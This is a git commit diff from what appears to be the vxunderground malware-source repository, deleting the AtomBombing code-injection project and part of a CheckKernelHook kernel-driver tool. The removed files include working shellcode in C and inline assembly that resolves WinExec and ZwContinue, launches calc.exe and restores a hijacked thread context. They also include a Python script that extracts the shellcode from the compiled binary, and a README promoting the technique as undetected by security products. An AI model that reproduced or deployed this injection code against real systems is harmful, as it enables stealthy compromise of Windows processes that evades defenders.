rem
This commit is contained in:
vxunderground 2022-05-16 06:36:11 -05:00
parent beeaf44c6b
commit d949cd38f0
389 changed files with 0 additions and 147521 deletions


@ -1,252 +0,0 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# DNX
project.lock.json
artifacts/
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignoreable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml


@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.40629.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombing", "AtomBombing\AtomBombing.vcxproj", "{D303FA55-CFF8-4484-888A-F06B21559014}"
ProjectSection(ProjectDependencies) = postProject
{DAD3D2B2-372F-4486-91FA-032CC0AA1133} = {DAD3D2B2-372F-4486-91FA-032CC0AA1133}
EndProjectSection
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombingShellcode", "AtomBombingShellcode\AtomBombingShellcode.vcxproj", "{DAD3D2B2-372F-4486-91FA-032CC0AA1133}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.ActiveCfg = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.Build.0 = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.ActiveCfg = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.Build.0 = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.ActiveCfg = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.Build.0 = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.ActiveCfg = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,58 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{D303FA55-CFF8-4484-888A-F06B21559014}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>AtomBombing</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>


@ -1,61 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{DAD3D2B2-372F-4486-91FA-032CC0AA1133}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>AtomBombingShellcode</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<MergeSections>
</MergeSections>
</Link>
<PostBuildEvent>
<Command>c:\python27\python.exe "$(SolutionDir)\$(ProjectName)\Scripts\Post_Link.py" "$(SolutionDir)$(Configuration)\$(ProjectName).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>


@ -1,31 +0,0 @@
import pefile
import sys
import os
DUMMY_FUNC = "\x55\x8b\xec\x51\xc7\x45\xfc\xbe\xba\xad\xde\x8b\xe5\x5d\xc3"
def main():
exe_path = sys.argv[1]
pe = pefile.PE(exe_path)
print "Starting!"
output = ""
text_section = ""
for section in pe.sections:
if ".text" in section.Name:
print (section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), section.SizeOfRawData )
text_section = pe.get_data(section.VirtualAddress, section.SizeOfRawData)
binary_shellcode = text_section[:text_section.find(DUMMY_FUNC)]
for byte in binary_shellcode:
output += "\\x%x" % ord(byte)
output = "#define SHELLCODE (\"%s\")" % output
folder, file_name = os.path.split(exe_path)
base, _ = os.path.splitext(file_name)
print os.path.join(folder, base+".h")
open(os.path.join(folder, base) + ".h", "wb").write(output)
open(os.path.join(folder, base) + ".text", "wb").write(text_section)
open(os.path.join(folder, base) + ".shellcode", "wb").write(binary_shellcode)
if __name__ == "__main__":
main()


@ -1,95 +0,0 @@
typedef void * (__stdcall *pfnLoadLibraryA)(void *lpLibFileName);
typedef void * (__stdcall *pfnGetProcAddress)(void * hModule, void * lpProcName);
typedef int(__stdcall *pfnWinExec)(void * lpCmdLine, unsigned int uCmdShow);
typedef int(__stdcall *pfnZwContinue)(void * lpContext, int TestAlert);
typedef struct _FUNCTIONPOINTERS
{
pfnLoadLibraryA pfnLoadLibraryA;
pfnGetProcAddress pfnGetProcAddress;
} FUNCTIONPOINTERS, *PFUNCTIONPOINTERS;
FUNCTIONPOINTERS g_FunctionPointers;
void shellcode_entry();
__declspec(naked) void fix_esp()
{
__asm{
mov eax, edi;
add ax, 0xc4;
mov esp, [eax];
sub sp, 0x1024;
// This is needed for alignment purposes
nop;
nop;
nop;
}
}
void shellcode_entry()
{
PFUNCTIONPOINTERS ptFunctionPointer = 0x13371337;
pfnWinExec pfnWinExec;
pfnZwContinue pfnZwContinue;
void * ptContext;
void * hKernel32;
void * hNtDll;
char pszKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' };
char pszNtDll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', '\0' };
char pszZwContinue[] = { 'Z','w','C','o','n','t','i','n','u','e', '\0'};
char pszWinExec[] = { 'W', 'i', 'n', 'E', 'x', 'e', 'c', '\0' };
char pszCalcExe[] = { 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', '\0' };
__asm{
mov[ptContext], edi;
}
hKernel32 = ptFunctionPointer->pfnLoadLibraryA(pszKernel32);
if (0 == hKernel32)
{
goto lblCleanup;
}
hNtDll = ptFunctionPointer->pfnLoadLibraryA(pszNtDll);
if (0 == hNtDll)
{
goto lblCleanup;
}
pfnZwContinue = ptFunctionPointer->pfnGetProcAddress(hNtDll, pszZwContinue);
if (0 == pfnZwContinue)
{
goto lblCleanup;
}
pfnWinExec = ptFunctionPointer->pfnGetProcAddress(hKernel32, pszWinExec);
if (0 == pfnWinExec)
{
goto lblCleanup;
}
pfnWinExec(pszCalcExe, 0);
pfnZwContinue(ptContext, 1);
lblCleanup:
return;
}
void dummy()
{
int dummy = 0xDEADBABE;
}
#include <Windows.h>
int main()
{
g_FunctionPointers.pfnGetProcAddress = GetProcAddress;
g_FunctionPointers.pfnLoadLibraryA = LoadLibraryA;
fix_esp();
shellcode_entry();
dummy();
}


@ -1,2 +0,0 @@
# atom-bombing
Heres a new code injection technique, dubbed AtomBombing, which exploits Windows atom tables and Async Procedure Calls (APC). Currently, this technique goes undetected by common security solutions that focus on preventing infiltration.


@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheckKernelHook", "CheckKernelHook\CheckKernelHook.vcxproj", "{D49C7CB9-A5C2-4377-A234-7C440407A30E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Debug|Win32.ActiveCfg = Debug|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Debug|Win32.Build.0 = Debug|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Release|Win32.ActiveCfg = Release|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,114 +0,0 @@
#include "AddService.h"
#include "stdafx.h"
#include "CheckKernelHookDlg.h"
#include <Winsvc.h>
#pragma once
BOOL Release(){
// HRSRC res = FindResource(NULL,MAKEINTRESOURCE(IDR_SYS),TEXT("BINARY"));
// if(!res)
// return FALSE;
// HGLOBAL resGlobal = LoadResource(NULL,res);
// if(!resGlobal)
// return FALSE;
// DWORD size=SizeofResource(NULL,res);
// BYTE* ptr=(BYTE*)LockResource(resGlobal);
// if(!ptr)
// return FALSE;
HANDLE hFile=CreateFile(TEXT("ReloadKernel.sys"), GENERIC_WRITE,
0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile==INVALID_HANDLE_VALUE)
return FALSE;
DWORD dw;
// if(!WriteFile(hFile,ptr,size,&dw,NULL)){
// CloseHandle(hFile);
// return FALSE;
// }
CloseHandle(hFile);
return TRUE;
}
BOOL UnloadDrv(TCHAR* DriverName){
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS ss;
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!hSCManager){
return FALSE;
}
hService = OpenService( hSCManager,DriverName,SERVICE_ALL_ACCESS);
if( !hService ) {
CloseServiceHandle(hSCManager);
return FALSE;
}
ControlService(hService, SERVICE_CONTROL_STOP, &ss);
DeleteService(hService);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
return TRUE;
}
BOOL LoadDrv(TCHAR* DriverName){
TCHAR DrvFullPathName[MAX_PATH];
SC_HANDLE schSCManager;
SC_HANDLE schService;
UnloadDrv(L"CheckKernelHook");
// if(!Release())
// return FALSE;
GetFullPathName(TEXT("CheckKernelHook.sys"), MAX_PATH, DrvFullPathName, NULL);
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!schSCManager)
return FALSE;
schService = CreateService(
schSCManager,DriverName,DriverName,
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL,
DrvFullPathName,
NULL,NULL,NULL,NULL,NULL
);
if (!schService){
if (GetLastError() == ERROR_SERVICE_EXISTS){
schService = OpenService(schSCManager,DriverName,SERVICE_ALL_ACCESS);
if (!schService){
CloseServiceHandle(schSCManager);
return FALSE;
}
}else{
CloseServiceHandle(schSCManager);
return FALSE;
}
}
if (!StartService(schService,0,NULL)){
if ( !(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING ) ){
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return FALSE;
}
}
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return TRUE;
}


@ -1,5 +0,0 @@
#include "stdafx.h"
BOOL Release();
BOOL UnloadDrv(TCHAR* DriverName);
BOOL LoadDrv(TCHAR* DriverName);


@ -1,94 +0,0 @@
// CheckKernelHook.cpp : 定义应用程序的类行为。
//
#include "stdafx.h"
#include "CheckKernelHook.h"
#include "CheckKernelHookDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// CCheckKernelHookApp
BEGIN_MESSAGE_MAP(CCheckKernelHookApp, CWinApp)
ON_COMMAND(ID_HELP, &CWinApp::OnHelp)
END_MESSAGE_MAP()
// CCheckKernelHookApp 构造
CCheckKernelHookApp::CCheckKernelHookApp()
{
// 支持重新启动管理器
m_dwRestartManagerSupportFlags = AFX_RESTART_MANAGER_SUPPORT_RESTART;
// TODO: 在此处添加构造代码,
// 将所有重要的初始化放置在 InitInstance 中
}
// 唯一的一个 CCheckKernelHookApp 对象
CCheckKernelHookApp theApp;
// CCheckKernelHookApp 初始化
BOOL CCheckKernelHookApp::InitInstance()
{
// 如果一个运行在 Windows XP 上的应用程序清单指定要
// 使用 ComCtl32.dll 版本 6 或更高版本来启用可视化方式,
//则需要 InitCommonControlsEx()。否则,将无法创建窗口。
INITCOMMONCONTROLSEX InitCtrls;
InitCtrls.dwSize = sizeof(InitCtrls);
// 将它设置为包括所有要在应用程序中使用的
// 公共控件类。
InitCtrls.dwICC = ICC_WIN95_CLASSES;
InitCommonControlsEx(&InitCtrls);
CWinApp::InitInstance();
AfxEnableControlContainer();
// 创建 shell 管理器,以防对话框包含
// 任何 shell 树视图控件或 shell 列表视图控件。
CShellManager *pShellManager = new CShellManager;
// 标准初始化
// 如果未使用这些功能并希望减小
// 最终可执行文件的大小,则应移除下列
// 不需要的特定初始化例程
// 更改用于存储设置的注册表项
// TODO: 应适当修改该字符串,
// 例如修改为公司或组织名
SetRegistryKey(_T("应用程序向导生成的本地应用程序"));
CCheckKernelHookDlg dlg;
m_pMainWnd = &dlg;
INT_PTR nResponse = dlg.DoModal();
if (nResponse == IDOK)
{
// TODO: 在此放置处理何时用
// “确定”来关闭对话框的代码
}
else if (nResponse == IDCANCEL)
{
// TODO: 在此放置处理何时用
// “取消”来关闭对话框的代码
}
// 删除上面创建的 shell 管理器。
if (pShellManager != NULL)
{
delete pShellManager;
}
// 由于对话框已关闭,所以将返回 FALSE 以便退出应用程序,
// 而不是启动应用程序的消息泵。
return FALSE;
}


@ -1,32 +0,0 @@
// CheckKernelHook.h : PROJECT_NAME 应用程序的主头文件
//
#pragma once
#ifndef __AFXWIN_H__
#error "在包含此文件之前包含“stdafx.h”以生成 PCH 文件"
#endif
#include "resource.h" // 主符号
// CCheckKernelHookApp:
// 有关此类的实现,请参阅 CheckKernelHook.cpp
//
class CCheckKernelHookApp : public CWinApp
{
public:
CCheckKernelHookApp();
// 重写
public:
virtual BOOL InitInstance();
// 实现
DECLARE_MESSAGE_MAP()
};
extern CCheckKernelHookApp theApp;


@ -1,129 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{D49C7CB9-A5C2-4377-A234-7C440407A30E}</ProjectGuid>
<RootNamespace>CheckKernelHook</RootNamespace>
<Keyword>MFCProj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<ValidateAllParameters>true</ValidateAllParameters>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</Midl>
<ResourceCompile>
<Culture>0x0804</Culture>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;_WINDOWS;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<ValidateAllParameters>true</ValidateAllParameters>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</Midl>
<ResourceCompile>
<Culture>0x0804</Culture>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
<None Include="res\CheckKernelHook.ico" />
<None Include="res\CheckKernelHook.rc2" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="AddService.h" />
<ClInclude Include="CheckKernelHook.h" />
<ClInclude Include="CheckKernelHookDlg.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="AddService.cpp" />
<ClCompile Include="CheckKernelHook.cpp" />
<ClCompile Include="CheckKernelHookDlg.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
